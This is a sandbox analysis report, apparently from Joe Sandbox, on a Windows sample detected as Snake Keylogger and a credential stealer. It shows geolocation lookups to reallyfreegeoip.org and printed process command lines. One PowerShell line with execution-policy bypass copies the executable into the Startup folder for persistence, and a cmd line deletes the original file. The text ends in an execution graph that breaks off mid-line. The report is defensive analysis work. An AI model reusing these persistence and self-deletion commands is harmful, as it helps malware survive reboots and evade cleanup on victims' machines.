                                                                      2025-01-10 20:55:57 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.949826104.21.48.14431184C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 20:55:59 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2025-01-10 20:55:59 UTC855INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:55:59 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1857348
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhiVcLc7kuxHSVIQLJ0Z0SuPVlOGtfriUmCF7OzbP0SFpWvib84TN97KuYLzM6k%2B5vSDlYA5ggvbleCqadR4yqKYXKu43KRW%2FWogIV%2BdnGEXx5QngefXXr3mh9xM1kU06JhifWGH"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fff92353f6343be-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1561&rtt_var=789&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=699&delivery_rate=1229473&cwnd=226&unsent_bytes=0&cid=fac13f6b5a92127e&ts=161&x=0"
                                                                      2025-01-10 20:55:59 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.949836104.21.48.14431184C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 20:56:00 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2025-01-10 20:56:00 UTC857INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:56:00 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1857350
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dB7dKNxe%2FQWymfta942QQpQ3TizJjUug5AP56rTddTsekKclRgXdU1YIY1szrRqAd8zzi%2Fy%2FMf04T0P6LnxeDnfM7DqaOGnXZx0QIgwZkrVJKQPcbxDkbc9e3n6x%2FPTfSr6lqtVk"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fff923d9c918c15-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1788&rtt_var=680&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1599123&cwnd=238&unsent_bytes=0&cid=7a2061b2a0967330&ts=153&x=0"
                                                                      2025-01-10 20:56:00 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.949845104.21.48.14431184C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 20:56:02 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2025-01-10 20:56:02 UTC857INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:56:02 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1857351
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y5juoLH2opwWG9TTLVQIdCxFA0Vwf%2F%2BqYKvYdE3POpqizdy4uhZYZccluT4APeQptQaGeUeXwcRvYNIvVYhsLMv3pVPWf4fEBwFNRQ%2BLeKiShj9EKZKkY63pqqs2i355yDBDuxT%2B"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fff9245eec4c461-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1731&rtt_var=661&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1641371&cwnd=228&unsent_bytes=0&cid=c19861ffbb29daf9&ts=139&x=0"
                                                                      2025-01-10 20:56:02 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.949857104.21.48.14431184C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 20:56:03 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2025-01-10 20:56:03 UTC857INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 20:56:03 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1857352
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ys81IcNp1Gmgz1tTnVNphePTqHo9gGJ4LO9RUkh67DV1di48kbEANucX27f%2B4KljDAka29CEV0Fqw6A8Fdc91v%2FxB9q6DdVk7rnaY8p%2FYlMRYgtz16HsHMNT6enu5IBaeSw%2FCiOE"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fff924e0d928c15-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1854&min_rtt=1762&rtt_var=844&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1168935&cwnd=238&unsent_bytes=0&cid=fc17e3f1c6a82306&ts=142&x=0"
                                                                      2025-01-10 20:56:03 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:15:55:43
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\upXUt2jZ0S.exe"
                                                                      Imagebase:0xe80000
                                                                      File size:555'520 bytes
                                                                      MD5 hash:857FC5F1DA7948839D47ABE238392EA2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2603874674.0000000004189000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:2
                                                                      Start time:15:55:44
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\upXUt2jZ0S.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'
                                                                      Imagebase:0xca0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:15:55:44
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff70f010000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:15:55:45
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\Desktop\upXUt2jZ0S.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\upXUt2jZ0S.exe"
                                                                      Imagebase:0x140000
                                                                      File size:555'520 bytes
                                                                      MD5 hash:857FC5F1DA7948839D47ABE238392EA2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.1542562831.0000000000592000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.1554551898.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:15:55:46
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                      Imagebase:0x7ff77afe0000
                                                                      File size:55'320 bytes
                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:7
                                                                      Start time:15:55:59
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"
                                                                      Imagebase:0x950000
                                                                      File size:555'520 bytes
                                                                      MD5 hash:857FC5F1DA7948839D47ABE238392EA2
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 68%, ReversingLabs
                                                                      • Detection: 61%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:8
                                                                      Start time:15:56:01
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'
                                                                      Imagebase:0xca0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:15:56:01
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff70f010000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:15:56:02
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe"
                                                                      Imagebase:0xc20000
                                                                      File size:555'520 bytes
                                                                      MD5 hash:857FC5F1DA7948839D47ABE238392EA2
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.1797959827.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:15:56:03
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\upXUt2jZ0S.exe"
                                                                      Imagebase:0xc50000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:15:56:03
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff70f010000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:15:56:03
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:choice /C Y /N /D Y /T 3
                                                                      Imagebase:0xbd0000
                                                                      File size:28'160 bytes
                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:16
                                                                      Start time:15:56:07
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1528
                                                                      Imagebase:0x670000
                                                                      File size:483'680 bytes
                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:9.4%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:2.2%
                                                                        Total number of Nodes:180
                                                                        Total number of Limit Nodes:21
                                                                        execution_graph 36176 6500b50 36177 6500b69 36176->36177 36178 6500b73 36176->36178 36177->36178 36181 6506810 36177->36181 36187 6506801 36177->36187 36182 6506815 36181->36182 36185 650683d 36182->36185 36193 65055b8 36182->36193 36184 6506883 36184->36178 36185->36184 36186 65055b8 OleInitialize 36185->36186 36186->36184 36188 6506810 36187->36188 36189 65055b8 OleInitialize 36188->36189 36191 650683d 36188->36191 36189->36191 36190 6506883 36190->36178 36191->36190 36192 65055b8 OleInitialize 36191->36192 36192->36190 36194 65055c3 36193->36194 36195 65068ae 36194->36195 36198 65068d8 36194->36198 36204 65068e8 36194->36204 36195->36185 36199 6506bf0 36198->36199 36200 6506910 36198->36200 36199->36195 36201 6506919 36200->36201 36210 6505654 36200->36210 36201->36195 36203 650693c 36205 6506bf0 36204->36205 36206 6506910 36204->36206 36205->36195 36207 6506919 36206->36207 36208 6505654 OleInitialize 36206->36208 36207->36195 36209 650693c 36208->36209 36212 650565f 36210->36212 36211 6506c33 36211->36203 36212->36211 36214 6505670 36212->36214 36215 6506c68 OleInitialize 36214->36215 36216 6506ccc 36215->36216 36216->36211 36242 6500040 36243 6500045 36242->36243 36244 650010e 36243->36244 36245 65002a3 36243->36245 36249 6500490 36243->36249 36253 6500480 36243->36253 36244->36245 36261 650e520 36244->36261 36251 6500480 2 API calls 36249->36251 36266 65004b8 36249->36266 36250 65004a4 36250->36244 36251->36250 36254 6500494 36253->36254 36257 6500480 2 API calls 36254->36257 36258 65004b8 2 API calls 36254->36258 36255 65004f2 36255->36244 36256 65004a2 36256->36244 36256->36255 36259 302dd53 KiUserCallbackDispatcher 36256->36259 36260 302dd60 KiUserCallbackDispatcher 36256->36260 36257->36256 36258->36256 36259->36255 36260->36255 36264 650e585 36261->36264 36262 650e9e8 WaitMessage 36262->36264 36264->36262 36265 650e5d2 36264->36265 36280 650c8dc 36264->36280 36265->36245 36267 65004bd 36266->36267 36268 65004f2 36267->36268 36271 302dd53 36267->36271 36276 302dd60 36267->36276 36268->36250 36272 302dd20 36271->36272 36273 302dd5a 36271->36273 36272->36268 36274 302de5a KiUserCallbackDispatcher 36273->36274 36275 302de5f 36273->36275 36274->36275 36275->36275 36277 302dd61 36276->36277 36278 302de5a KiUserCallbackDispatcher 36277->36278 36279 302de5f 36277->36279 36278->36279 36281 650f288 DispatchMessageW 36280->36281 36282 650f2f4 36281->36282 36282->36264 36283 6501f80 36284 6501f90 36283->36284 36288 6501fb1 36284->36288 36291 6501fb8 SendMessageW 36284->36291 36285 6501fa1 36289 6501fb8 SendMessageW 36288->36289 36290 6502024 36289->36290 36290->36285 36292 6502024 36291->36292 36292->36285 36217 302d680 36218 302d685 DuplicateHandle 36217->36218 36219 302d716 36218->36219 36370 302acb0 36371 302acb1 36370->36371 36375 302ada8 36371->36375 36380 302ad99 36371->36380 36372 302acbf 36377 302ada9 36375->36377 36376 302addc 36376->36372 36377->36376 36378 302afe0 GetModuleHandleW 36377->36378 36379 302b00d 36378->36379 36379->36372 36382 302ad9c 36380->36382 36381 302addc 36381->36372 36382->36381 36383 302afe0 GetModuleHandleW 36382->36383 36384 302b00d 36383->36384 36384->36372 36220 6500858 36222 6500891 36220->36222 36221 6500ac5 36223 6500b73 36221->36223 36226 6506810 OleInitialize 36221->36226 36227 6506801 OleInitialize 36221->36227 36222->36221 36228 6503770 36222->36228 36233 6503780 36222->36233 36226->36223 36227->36223 36230 6503780 36228->36230 36229 650378e 36229->36221 36230->36229 36231 65037c3 SendMessageW 36230->36231 36232 6503844 36231->36232 36232->36221 36235 6503785 36233->36235 36234 650378e 36234->36221 36235->36234 36236 65037c3 SendMessageW 36235->36236 36237 6503844 36236->36237 36237->36221 36238 65019d8 36239 6501a20 SetWindowTextW 36238->36239 36240 6501a1a 36238->36240 36241 6501a51 36239->36241 36240->36239 36293 3024668 36294 3024669 36293->36294 36295 3024686 36294->36295 36299 3024779 36294->36299 36304 3023e10 36295->36304 36297 30246a5 36300 302477c 36299->36300 36308 3024878 36300->36308 36312 3024888 36300->36312 36305 3023e1b 36304->36305 36320 3025c64 36305->36320 36307 3026fe1 36307->36297 36309 302487c 36308->36309 36311 302498c 36309->36311 36316 3024248 36309->36316 36314 3024889 36312->36314 36313 302498c 36313->36313 36314->36313 36315 3024248 CreateActCtxA 36314->36315 36315->36313 36317 3025918 CreateActCtxA 36316->36317 36319 30259db 36317->36319 36321 3025c6f 36320->36321 36324 3025c84 36321->36324 36323 30270e5 36323->36307 36325 3025c8f 36324->36325 36328 3025cb4 36325->36328 36327 30271c2 36327->36323 36329 3025cbf 36328->36329 36332 3025ce4 36329->36332 36331 30272c5 36331->36327 36334 3025cef 36332->36334 36333 3028609 36333->36331 36334->36333 36336 302cd60 36334->36336 36337 302cd64 36336->36337 36338 302cdb5 36337->36338 36341 302cf20 36337->36341 36345 302cee1 36337->36345 36338->36333 36342 302cf25 36341->36342 36343 302cf67 36342->36343 36349 302b780 36342->36349 36343->36338 36346 302cee4 36345->36346 36346->36338 36347 302ce80 36346->36347 36348 302b780 2 API calls 36346->36348 36347->36338 36348->36347 36350 302b78b 36349->36350 36352 302dc78 36350->36352 36353 302d084 36350->36353 36352->36352 36354 302d08f 36353->36354 36355 3025ce4 2 API calls 36354->36355 36356 302dce7 36355->36356 36357 